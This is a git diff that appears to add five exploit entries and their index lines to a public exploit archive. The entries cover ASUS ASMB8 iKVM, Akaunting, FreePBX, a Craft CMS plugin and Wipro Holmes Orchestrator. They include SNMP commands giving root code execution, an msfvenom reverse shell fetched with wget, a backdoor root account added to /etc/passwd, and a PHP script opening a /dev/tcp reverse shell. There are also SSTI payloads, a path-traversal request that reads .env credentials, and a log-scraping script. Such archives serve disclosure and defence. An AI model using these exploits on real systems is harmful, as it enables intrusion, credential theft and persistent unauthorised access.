diff --git a/exploits/hardware/remote/52033.txt b/exploits/hardware/remote/52033.txt new file mode 100644 index 000000000..e683aea13 --- /dev/null +++ b/exploits/hardware/remote/52033.txt @@ -0,0 +1,61 @@ +# Exploit Title: ASUS ASMB8 iKVM 1.14.51 - Remote Code Execution (RCE) & SSH Access +# Date: 2023-02-16 +# Exploit Author: d1g@segfault.net for NetworkSEC [NWSSA-002-2023] +# Vendor Homepage: https://servers.asus.com/search?q=ASMB8 +# Version/Model: ASMB8 iKVM Firmware <= 1.14.51 (probably others) +# Tested on: Linux AMI2CFDA1C7570E 2.6.28.10-ami armv5tejl +# CVE: CVE-2023-26602 + +++++++++++++++++++++ +0x00 DESCRIPTION +++++++++++++++++++++ +During a recent engagement, a remote server management interface has been +discovered. Furthermore, SNMPv2 was found to be enabled, offering write +access to the private community, subsequently allowing us to introduce +SNMP arbitrary extensions to achieve RCE. +We also found a hardcoded account sysadmin:superuser by cracking the +shadow file (md5crypt) found on the system and identifed an "anonymous" +user w/ the same password, however a lock seems to be in place to prevent +using these credentials via SSH (running defshell as default shell). ++++++++++++++++ +0x01 IMPACT ++++++++++++++++ +By exploiting SNMP arbitrary extension, we are able to run any command on +the system w/ root privileges, and we are able to introduce our own user +circumventing the defshell restriction for SSH. ++++++++++++++++++++++++++++++++ +0x02 PROOF OF CONCEPT (PoC) ++++++++++++++++++++++++++++++++ +At first, we have to create required extensions on the system, e.g. via +snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private x.x.x.x 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = '-c "[command]"' +and if everything is set, we can just run that command by +snmpbulkwalk -c public -v2c x.x.x NET-SNMP-EXTEND-MIB::nsExtendObjects +which will execute our defined command and show us its output. ++++++++++++++++++++++++++++++++ +0x03 SSH Remote Root Access ++++++++++++++++++++++++++++++++ +The identified RCE can be used to transfer a reverse tcp shell created +by msfvenom for arm little-endian, e.g. +msfvenom -p linux/armle/shell_reverse_tcp LHOST=x.x.x.x LPORT=4444 -f elf -o rt.bin +We can now transfer the binary, adjust permissions and finally run it: +snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private x.x.x.x 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = '-c "wget -O /var/tmp/rt.bin http://x.x.x.x/rt.bin"' +snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private x.x.x.x 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = '-c "chmod +x /var/tmp/rt.bin"' +snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private x.x.x.x 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = '-c "/var/tmp/rt.bin"' +Again, we have to request execution of the lines in the MIB via: +snmpbulkwalk -c public -v2c x.x.x.x NET-SNMP-EXTEND-MIB::nsExtendObjects +We get a reverse connection from the host, and can now act on the local system +to easily echo our own line into /etc/passwd: +echo d1g:OmE2EUpLJafIk:0:0:root:/root:/bin/sh >> /etc/passwd +By setting the standard shell to /bin/sh, we are able to get a SSH root +shell into the system, effectively circumventing the defshell restriction. +$ sshpass -p xxxx ssh x.x.x.x -oHostKeyAlgorithms=+ssh-dss -l d1g +BusyBox v1.13.2 (2017-07-11 18:39:07 CST) built-in shell (ash) +Enter 'help' for a list of built-in commands. +# uname -a +Linux AMI2CFDA1C7570E 2.6.28.10-ami #1 Tue Jul 11 18:49:20 CST 2017 armv5tejl unknown +# uptime +15:01:45 up 379 days, 23:33, load average: 2.63, 1.57, 1.25 +# head -n 1 /etc/shadow +sysadmin:$1$A17c6z5w$5OsdHjBn1pjvN6xXKDckq0:14386:0:99999:7::: +--- +#EOF \ No newline at end of file diff --git a/exploits/php/webapps/52030.txt b/exploits/php/webapps/52030.txt new file mode 100644 index 000000000..7395aadf8 --- /dev/null +++ b/exploits/php/webapps/52030.txt @@ -0,0 +1,55 @@ +# Exploit Title: Akaunting 3.1.8 - Server-Side Template Injection (SSTI) +# Exploit Author: tmrswrr +# Date: 30/05/2024 +# Vendor: https://akaunting.com/forum +# Software Link: https://akaunting.com/apps/crm +# Vulnerable Version(s): 3.1.8 +# Tested : https://www.softaculous.com/apps/erp/Akaunting + + +1 ) Login with admin cred and go to : Items > New Item + https://127.0.0.1/Akaunting/1/common/items +2 ) Write SSTI payload : {{7*7}} Name field , write Sale and Purchase Price random numbers +3 ) Save it +4 ) You will be see result : + 49 + + +==================================================================================== + +1 ) Login with admin cred and go to :Settings > Taxes > New Tax + https://127.0.0.1/Akaunting/1/settings/taxes/1/edit +2 ) Write SSTI payload : {{7*7}} Name field , write Sale and Purchase Price random numbers +3 ) Save it +4 ) You will be see result : + 49 + > {{'a'.toUpperCase()}} + > A + > {{'a'.concat('b')}} + > ab +==================================================================================== + + +1 ) Login with admin cred and go to : Banking > Transactions > New Income +https://127.0.0.1/Akaunting/1/banking/transactions/create?type=income +2 ) Write SSTI payload : {{7*7}} Description field +3 ) Save it +4 ) You will be see result : + 49 + > {{'a'.toUpperCase()}} + > A + > {{'a'.concat('b')}} + > ab + +======================================================================================= + +1 ) Login with admin cred +https://127.0.0.1/Akaunting/1/purchases/vendors/1/edit +2 ) Write SSTI payload : {{7*7}} Name field +3 ) Save it +4 ) You will be see result : + 49 + > {{'a'.toUpperCase()}} + > A + > {{'a'.concat('b')}} + > ab \ No newline at end of file diff --git a/exploits/php/webapps/52031.php b/exploits/php/webapps/52031.php new file mode 100644 index 000000000..f638d80e9 --- /dev/null +++ b/exploits/php/webapps/52031.php @@ -0,0 +1,41 @@ +# Exploit Title: FreePBX 16 - Remote Code Execution (RCE) (Authenticated) +# Exploit Author: Cold z3ro +# Date: 6/1/2024 +# Tested on: 14,15,16 +# Vendor: https://www.freepbx.org/ + +%26 /dev/tcp/'.$backconnectip.'/4444 0>%261)'); + curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); + curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); + + echo $response = curl_exec($ch)."\n"; + + curl_close($ch); + +?> \ No newline at end of file diff --git a/exploits/php/webapps/52034.txt b/exploits/php/webapps/52034.txt new file mode 100644 index 000000000..cee911905 --- /dev/null +++ b/exploits/php/webapps/52034.txt @@ -0,0 +1,111 @@ +# Exploit Title: Craft CMS Logs Plugin 3.0.3 - Path Traversal (Authenticated) +# Date: 2022.01.26 +# Exploit Author: Steffen Rogge +# Vendor Homepage: https://github.com/ethercreative/logs +# Software Link: https://plugins.craftcms.com/logs +# Version: <=3.0.3 +# Tested on: Linux +# CVE : CVE-2022-23409 + +product: Ethercreative Logs plugin for Craft CMS +fixed version: >=3.0.4 +impact: Medium +found: 2021-07-06 +SEC Consult Vulnerability Lab +An integrated part of SEC Consult, an Atos company +Europe | Asia | North America +https://www.sec-consult.com +======================================================================= +Vendor description: +------------------- +"A quick and dirty way to access your logs from inside the CP" +As found on the plugin store page: https://plugins.craftcms.com/logs +Active Installs 4,093 (as of 2021-07-07) +Business recommendation: +------------------------ +The vendor provides a patched version v3.0.4 which should be installed immediately. +Vulnerability overview/description: +----------------------------------- +1) Authenticated Path Traversal (CVE-2022-23409) +The plugin "Logs" provides a functionality to read log files of the Craft CMS system inside +the backend of the CMS. As the requested logfile is not properly validated, an attacker is +able to request arbitrary files from the underlying file system with the permissions of the +web service user. +Proof of concept: +----------------- +1) Authenticated Path Traversal (CVE-2022-23409) +As the plugin is installed as an administrator of the system and the function is only accessible +after being logged in as an admin, an attacker needs to be authenticated as an administrator in +the backend in order to extract the needed "{MD5}_identity" cookie for the crafted request. +The vulnerable endpoint is provided by the plugin under the following path: +https://vulnerablesite.com/index.php/admin/actions/logs/logs/stream +The vulnerable controller for that endpoint can be found here: +https://github.com/ethercreative/logs/blob/master/src/Controller.php +The function "actionStream()" provides an endpoint for the Craft CMS and does not validate input +values before file content is being read by the function "file_get_contents". +public function actionStream () +{ +$logsDir = \Craft::getAlias('@storage/logs'); +$logFile = \Craft::$app->request->getParam('log'); +$currentLog = \Craft::$app->request->get('log', $logFile); +$log = file_get_contents($logsDir . '/' . $currentLog); +exit($log); +} +A crafted GET parameter with the name "log" can be used to access files on the underlying filesystem +with rights as the user executing the web server. In most cases this will be the user "www-data". +In order to read the file ".env" or ".env.php" which contains the environment configuration and as +such also the database credentials, the following request can be used: +GET /admin/actions/logs/logs/stream?log=../../.env HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0 +Connection: close +Cookie: 1031b8c41dfff97a311a7ac99863bdc5_identity=; +The response then discloses the file content of the file ".env": +HTTP/1.1 200 OK +Date: Thu, 07 Jul 2021 10:08:52 GMT +Server: nginx +Content-Type: text/html; charset=UTF-8 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate +Pragma: no-cache +Set-Cookie: CraftSessionId=2uisculfj8t9q1tnbiukl6ogjf; path=/; secure; HttpOnly +Content-Length: 1600 +Connection: close +[...] +$craftEnvVars = [ +'DB_DRIVER' => 'mysql', +'DB_SERVER' => '********', +'DB_USER' => '********', +'DB_PASSWORD' => '********', +'DB_DATABASE' => '********', +'DB_SCHEMA' => 'public', +'DB_TABLE_PREFIX' => '', +'DB_PORT' => '********', +'SECURITY_KEY' => '********', +[...] +Vulnerable / tested versions: +----------------------------- +The following version has been tested which was the latest version available at the time +of the test: +* Version 3.0.3 released on November 25, 2019 +Distributed through the Craft Plugin Store https://plugins.craftcms.com/logs +Vendor contact timeline: +------------------------ +2021-07-07: Contacting vendor through dev@ethercreative.co.uk +2021-07-08: Response from vendor, no encryption available but vendor accepted to be responsible +for any risks involved with plaintext communication +2021-07-08: Advisory was sent to vendor unencrypted +2021-07-09: Vendor released a patch for this vulnerability with version 3.0.4 +(https://github.com/ethercreative/logs/commit/eb225cc78b1123a10ce2784790f232d71c2066c4) +2021-07-12: Updated Plugin has been tested on an up-to-date CraftCMS installation +(CraftCMS 3.7.0, PHP 8, MySQL 8, Logs Plugin 3.0.4) +2022-01-24: Release of security advisory +Solution: +--------- +The vendor released a patched version 3.0.4 or higher which can be retrieved from their +website/github: +https://plugins.craftcms.com/logs +https://github.com/ethercreative/logs/commit/eb225cc78b1123a10ce2784790f232d71c2066c4 +Workaround: +----------- +Uninstall/Disable the plugin and access the Craft CMS logs via SSH or other services. \ No newline at end of file diff --git a/exploits/windows/remote/52032.py b/exploits/windows/remote/52032.py new file mode 100755 index 000000000..c7107104c --- /dev/null +++ b/exploits/windows/remote/52032.py @@ -0,0 +1,77 @@ +# Exploit Title: Wipro Holmes Orchestrator 20.4.1 - Log File Disclosure +# Date: 09/08/2021 +# Exploit Author: Rizal Muhammed @ub3rsick +# Vendor Homepage: https://www.wipro.com/holmes/ +# Version: Wipro Holmes Orchestrator v20.4.1 +# Tested on: Windows +# CVE : CVE-2021-38283 + +import requests as rq +import argparse +import datetime +import os +from calendar import monthrange +from multiprocessing.dummy import Pool as ThreadPool +from functools import partial + +# Change if running on different port +port = 8001 +log_list = [ + "AlertService.txt", "ApprovalService.txt", "AuditService.txt", "CustomerController.txt", + "CustomerDomainCredentialService.txt", "CustomerFile.zip", "CustomerService.txt", + "DashboardController.txt", "DataParseService.txt", "DomainService.txt", "ExecutionService.txt", + "ExternalAPIService.txt", "FilesController.txt", "FormService.txt", "InfrastructureService.txt", + "ITSMConfigPrepService.txt", "LicenseService.txt", "LoginService.txt", "MailService.txt", + "MasterdataController.txt", "NetworkService.txt", "OrchestrationPreparationService.txt", + "ProblemInfrastructureService.txt", "ProcessExecutionService.txt", "ServiceRequestService.txt", + "SolutionController.txt", "SolutionLiveService.txt", "SolutionService.txt", "StorageService.txt", + "TaskService.txt", "TicketingService.txt", "UserController.txt", "UtilityService.txt" +] + +def check_month(val): + ival = int(val) + if ival > 0 and ival < 13: + return ival + else: + raise argparse.ArgumentTypeError("%s is not a valid month" % val) + +def check_year(val): + iyear = int(val) + if iyear >= 1960 and iyear <= datetime.date.today().year: + return iyear + else: + raise argparse.ArgumentTypeError("%s is not a valid year" % val) + +def do_request(target, date, log_file): + log_url = f"http://{target}/log/{date}/{log_file}" + log_name = f"{date}_{log_file}" + print(f"[*] Requesting Log: /log/{date}/{log_file}") + resp = rq.get(log_url) + if resp.status_code == 200 and not "Wipro Ltd." in resp.text: + print(f"[+] Success: {log_url}") + with open(f"logs/{log_name}", 'w') as lf: + lf.write(resp.text) + print(f"[*] Log File Written to ./logs/{log_name}") + +def main(): + parser = argparse.ArgumentParser(description="Wipro Holmes Orchestrator 20.4.1 Unauthenticated Log File Disclosure", + epilog="Vulnerability Discovery, PoC Author - Rizal Muhammed @ub3sick") + parser.add_argument("-t", "--target-ip", help="IP Address of the target server", required=True) + parser.add_argument("-m", "--month", help="Month of the log, (1=JAN, 2=FEB etc.)", required=True, type=check_month) + parser.add_argument("-y", "--year", help="Year of the log", required=True, type=check_year) + args = parser.parse_args() + + ndays = monthrange(args.year, args.month)[1] + date_list = [f"{datetime.date(args.year, args.month, day)}" for day in range(1, ndays + 1)] + target = f"{args.target_ip}:{port}" + + # Create folder "logs" to save log files, if it does not exist + if not os.path.exists("./logs"): + os.makedirs("./logs") + + for log_date in date_list: + for log_file in log_list: + do_request(target, log_date, log_file) + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 66e01cb52..3536fa4eb 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -3342,6 +3342,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 42726,exploits/hardware/remote/42726.py,"Astaro Security Gateway 7 - Remote Code Execution",2017-09-13,"Jakub Palaczynski",remote,hardware,,2017-09-15,2017-09-15,0,CVE-2017-6315,,,,, 36511,exploits/hardware/remote/36511.txt,"Astaro Security Gateway 8.1 - HTML Injection",2012-12-27,"Vulnerability Research Laboratory",remote,hardware,,2012-12-27,2015-03-27,1,,,,,,https://www.securityfocus.com/bid/51301/info 22898,exploits/hardware/remote/22898.txt,"Asus AAM6330BI/AAM6000EV ADSL Router - Information Disclosure",2003-07-14,cw,remote,hardware,,2003-07-14,2012-11-22,1,,,,,,https://www.securityfocus.com/bid/8183/info +52033,exploits/hardware/remote/52033.txt,"ASUS ASMB8 iKVM 1.14.51 - Remote Code Execution (RCE) & SSH Access",2024-06-01,ub3rsick,remote,hardware,,2024-06-01,2024-06-01,0,CVE-2023-26602,,,,, 44524,exploits/hardware/remote/44524.rb,"ASUS infosvr - Authentication Bypass Command Execution (Metasploit)",2018-04-24,Metasploit,remote,hardware,9999,2018-04-24,2018-05-02,1,CVE-2014-9583,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/37a844bef0e2fc648663d3bd15ee9101a5b4511c/modules/exploits/linux/misc/asus_infosvr_auth_bypass_exec.rb 31033,exploits/hardware/remote/31033.py,"ASUS RT-N56U - Remote Buffer Overflow (ROP)",2014-01-19,"Jacob Holcomb",remote,hardware,80,2014-01-20,2016-12-04,0,CVE-2013-6343;OSVDB-102267,,,,, 35688,exploits/hardware/remote/35688.py,"ASUSWRT 3.0.0.4.376_1071 - LAN Backdoor Command Execution",2015-01-04,"Friedrich Postelstorfer",remote,hardware,,2015-01-04,2015-01-08,1,OSVDB-116691;CVE-2014-9583,,,,, @@ -13850,6 +13851,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 3752,exploits/php/webapps/3752.txt,"AjPortal2Php - 'PagePrefix' Remote File Inclusion",2007-04-17,"Alkomandoz Hacker",webapps,php,,2007-04-16,,1,OSVDB-37571;CVE-2007-2142;OSVDB-37570;OSVDB-37569;OSVDB-37568;OSVDB-37567;OSVDB-37566;OSVDB-37565,,,,, 7086,exploits/php/webapps/7086.txt,"AJSquare Free Polling Script - 'DB' Multiple Vulnerabilities",2008-11-10,G4N0K,webapps,php,,2008-11-09,,1,OSVDB-57333;CVE-2008-7046;CVE-2008-7045;OSVDB-49779;CVE-2008-7044,,,,, 2315,exploits/php/webapps/2315.txt,"Akarru 0.4.3.34 - 'bm_content' Remote File Inclusion",2006-09-06,ddoshomo,webapps,php,,2006-09-05,,1,OSVDB-28566;CVE-2006-4645,,,,, +52030,exploits/php/webapps/52030.txt,"Akaunting 3.1.8 - Server-Side Template Injection (SSTI)",2024-06-01,tmrswrr,webapps,php,,2024-06-01,2024-06-01,0,,,,,, 51870,exploits/php/webapps/51870.txt,"Akaunting < 3.1.3 - RCE",2024-03-10,u32i,webapps,php,,2024-03-10,2024-03-10,0,CVE-2024-22836,,,,, 21251,exploits/php/webapps/21251.txt,"akcms 4.2.4 - Information Disclosure",2012-09-11,L0n3ly-H34rT,webapps,php,,2012-09-11,2012-09-16,1,OSVDB-85488,,,,http://www.exploit-db.comakcms4.2.4.tar.gz, 18293,exploits/php/webapps/18293.txt,"Akiva WebBoard 8.x - SQL Injection",2011-12-30,"Alexander Fuchs",webapps,php,,2011-12-30,2011-12-30,1,OSVDB-86023;CVE-2011-5204;CVE-2011-5203;OSVDB-78069,,,,, @@ -16503,6 +16505,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 46054,exploits/php/webapps/46054.txt,"Craft CMS 3.0.25 - Cross-Site Scripting",2018-12-27,"Raif Berkay Dincel",webapps,php,80,2018-12-27,2019-01-02,0,CVE-2018-20418,"Cross-Site Scripting (XSS)",,,http://www.exploit-db.comCraft-3.0.25.rar, 46496,exploits/php/webapps/46496.txt,"Craft CMS 3.1.12 Pro - Cross-Site Scripting",2019-03-04,"Ismail Tasdelen",webapps,php,80,2019-03-04,2019-03-04,0,CVE-2019-9554,"Cross-Site Scripting (XSS)",,,, 51918,exploits/php/webapps/51918.py,"Craft CMS 4.4.14 - Unauthenticated Remote Code Execution",2024-03-25,"Olivier Lasne",webapps,php,,2024-03-25,2024-03-25,0,,,,,, +52034,exploits/php/webapps/52034.txt,"Craft CMS Logs Plugin 3.0.3 - Path Traversal (Authenticated)",2024-06-01,ub3rsick,webapps,php,,2024-06-01,2024-06-01,0,CVE-2022-23409,,,,, 48492,exploits/php/webapps/48492.py,"CraftCMS 3 vCard Plugin 1.0.0 - Remote Code Execution",2020-05-20,"Wade Guest",webapps,php,,2020-05-20,2020-05-20,0,,,,,, 1645,exploits/php/webapps/1645.pl,"Crafty Syntax Image Gallery 3.1g - Remote Code Execution",2006-04-04,undefined1_,webapps,php,,2006-04-03,,1,OSVDB-24387;CVE-2006-1668;OSVDB-24386;CVE-2006-1667,,,,, 6307,exploits/php/webapps/6307.txt,"Crafty Syntax Live Help 2.14.6 - 'department' SQL Injection",2008-08-25,"GulfTech Security",webapps,php,,2008-08-24,2018-01-05,1,OSVDB-47782;CVE-2008-3845;OSVDB-47781;GTSA-00119,,,,,http://gulftech.org/advisories/Crafty%20Syntax%20Live%20Help%20SQL%20Injection/119 @@ -18867,6 +18870,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 40296,exploits/php/webapps/40296.txt,"FreePBX 13.0.35 - Remote Command Execution",2016-08-29,0x4148,webapps,php,,2016-08-29,2016-08-29,0,,,,,, 40312,exploits/php/webapps/40312.txt,"FreePBX 13.0.35 - SQL Injection",2016-08-29,i-Hmx,webapps,php,,2016-08-29,2016-08-29,0,,,,,, 40345,exploits/php/webapps/40345.txt,"FreePBX 13.0.x < 13.0.154 - Remote Command Execution",2016-09-07,i-Hmx,webapps,php,,2016-09-07,2016-09-08,0,,,,,, +52031,exploits/php/webapps/52031.php,"FreePBX 16 - Remote Code Execution (RCE) (Authenticated)",2024-06-01,"Cold z3ro",webapps,php,,2024-06-01,2024-06-01,0,,,,,, 2665,exploits/php/webapps/2665.txt,"FreePBX 2.1.3 - 'upgrade.php' Remote File Inclusion",2006-10-28,"Mehmet Ince",webapps,php,,2006-10-27,2016-10-22,1,OSVDB-34694;CVE-2006-7107,,,,http://www.exploit-db.comfreepbx-2.1.3.tgz, 18650,exploits/php/webapps/18650.py,"FreePBX 2.10.0 / Elastix 2.2.0 - Remote Code Execution",2012-03-23,muts,webapps,php,,2012-03-23,2021-07-29,1,OSVDB-80544;CVE-2012-4869,,,http://www.exploit-db.com/screenshots/idlt19000/elastix-root.png,, 32214,exploits/php/webapps/32214.pl,"FreePBX 2.11.0 - Remote Command Execution",2014-03-12,@0x00string,webapps,php,80,2014-03-12,2018-04-12,1,CVE-2014-1903;OSVDB-103240,,,,,https://github.com/0x00string/oldays/blob/ace197a0a8f3c2b8111ffe55596bf1dca8a3fdd6/CVE-2014-1903.pl @@ -45700,6 +45704,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 3420,exploits/windows/remote/3420.html,"WinZip 10.0.7245 - FileView ActiveX Buffer Overflow (2)",2007-03-06,prdelka,remote,windows,,2007-03-05,,1,OSVDB-30432;CVE-2006-3890,,,,, 2785,exploits/windows/remote/2785.c,"WinZip 10.0.7245 - FileView ActiveX Remote Buffer Overflow",2006-11-15,prdelka,remote,windows,,2006-11-14,2016-09-14,1,CVE-2006-6884,,,,http://www.exploit-db.comwinzip110.exe, 16607,exploits/windows/remote/16607.rb,"WinZip FileView - 'WZFILEVIEW.FileViewCtrl.61' ActiveX Buffer Overflow (Metasploit)",2010-04-30,Metasploit,remote,windows,,2010-04-30,2011-03-10,1,CVE-2006-5198;OSVDB-30433,"Metasploit Framework (MSF)",,,, +52032,exploits/windows/remote/52032.py,"Wipro Holmes Orchestrator 20.4.1 - Log File Disclosure",2024-06-01,ub3rsick,remote,windows,,2024-06-01,2024-06-01,0,CVE-2021-38283,,,,, 18125,exploits/windows/remote/18125.rb,"Wireshark - console.lua pre-loading (Metasploit)",2011-11-19,Metasploit,remote,windows,,2011-11-19,2011-11-19,1,CVE-2011-3360;OSVDB-75347,"Metasploit Framework (MSF)",,,,http://technet.microsoft.com/en-us/security/advisory/2269637 11453,exploits/windows/remote/11453.py,"Wireshark 1.2.5 - LWRES getaddrbyname Buffer Overflow",2010-02-15,"Nullthreat & Pure|Hate",remote,windows,,2010-02-14,2010-09-05,1,,,,http://www.exploit-db.com/screenshots/idlt11500/wire-poc.png,http://www.exploit-db.comwireshark-win32-1.2.5.exe, 17195,exploits/windows/remote/17195.rb,"Wireshark 1.4.4 - 'packet-dect.c' Remote Stack Buffer Overflow (Metasploit) (2)",2011-04-19,Metasploit,remote,windows,,2011-04-21,2011-04-21,1,CVE-2011-1591;OSVDB-71848,"Metasploit Framework (MSF)",,,http://www.exploit-db.comwireshark-win32-1.4.1.exe,